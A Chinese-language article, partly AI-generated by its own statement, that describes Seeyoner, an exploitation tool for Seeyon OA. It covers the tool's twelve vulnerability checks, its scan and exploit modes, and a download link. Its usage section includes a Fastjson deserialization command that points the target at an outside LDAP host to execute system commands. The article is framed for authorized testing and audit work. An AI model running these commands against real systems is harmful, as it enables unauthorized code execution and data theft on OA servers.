Seeyoner是一款专为致远OA系统设计的漏洞检测与利用工具,由安全研究者开发,旨在帮助安全研究人员和系统管理员快速发现和验证致远OA系统中的安全问题。
【免费下载链接】seeyon-exploit致远OA漏洞检测项目地址: https://gitcode.com/gh_mirrors/se/seeyon-exploit
工具概述
Seeyoner支持两种主要操作模式:扫描模式和利用模式。扫描模式能够全面检测致远OA系统中的多种问题,而利用模式则允许对特定问题进行深度验证。
核心功能特性
扫描模式功能
- 支持12种常见致远OA问题检测
- Fastjson反序列化问题检测
- 管理员会话信息检测
- 文件下载与上传问题检测
- 批量目标扫描支持
利用模式功能
- 针对特定问题的精准验证
- 第三方控制器会话信息验证
- 系统命令执行能力
- LDAP服务集成支持
项目架构
项目采用Go语言开发,具有清晰的模块化结构:
- cmd目录: 包含命令行工具的主要功能模块,包括exploit.go、list.go、root.go、scan.go
- core目录: 核心功能实现,包括工厂模式和Seeyoner主逻辑
- vulners目录: 包含12个具体的问题检测模块(sy01.go - sy12.go)
详细使用方法
基础扫描操作
全问题探测:
seeyoner.exe -u http://xxx.com -vn all -m scan指定问题探测:
seeyoner.exe -u http://xxx.com -vn 1 -m scan问题验证操作
以Session信息+zip文件上传解压为例:
seeyoner.exe -u http://xxxx.com -vn 2 -m runFastjson反序列化问题验证:
seeyoner.exe -u http://xxxx.com -vn 1 -m run -a ldap://x.x.x.x:1389/TomcatBypass/TomcatEcho -c whoami问题列表详解
通过-show参数可以查看完整的问题列表:
- seeyon<8.0_fastjson反序列化
- thirdpartyController.do管理员会话信息
- webmail.do文件下载(CNVD-2020-62422)
- ajax.do文件上传
- getSessionList会话列表
- htmlofficeservlet文件上传
- initDataAssess.jsp信息
- DownExcelBeanServlet信息
- createMysql.jsp数据库信息
- test.jsp路径
- setextno.jsp路径
- status.jsp路径(状态监控页面)
技术特点
- 高效性能: 采用并发处理,支持大规模目标扫描
- 模块化设计: 每个问题独立模块,便于扩展和维护
- 易于使用: 简洁的命令行界面,降低使用门槛
- 持续更新: 跟随致远OA新问题发现而持续更新
应用场景
- 企业安全审计: 定期对部署的致远OA系统进行安全检查
- 渗透测试: 在授权测试中验证系统安全性
- 安全研究: 学习和理解OA系统问题原理
- 应急响应: 快速检测和验证安全事件中的问题
获取与部署
要获取Seeyoner工具,可以使用以下命令克隆项目:
git clone https://gitcode.com/gh_mirrors/se/seeyon-exploit项目依赖Go语言环境,部署后可直接编译使用。
安全使用提示
请仅在获得授权的情况下使用此工具进行安全测试。未经授权的扫描和验证可能违反法律法规。
Seeyoner作为安全研究工具,旨在帮助提升系统安全性,请合理合法使用。通过正确使用该工具,可以有效提升致远OA系统的安全防护能力,保障企业信息安全。
【免费下载链接】seeyon-exploit致远OA漏洞检测项目地址: https://gitcode.com/gh_mirrors/se/seeyon-exploit
创作声明:本文部分内容由AI辅助生成(AIGC),仅供参考
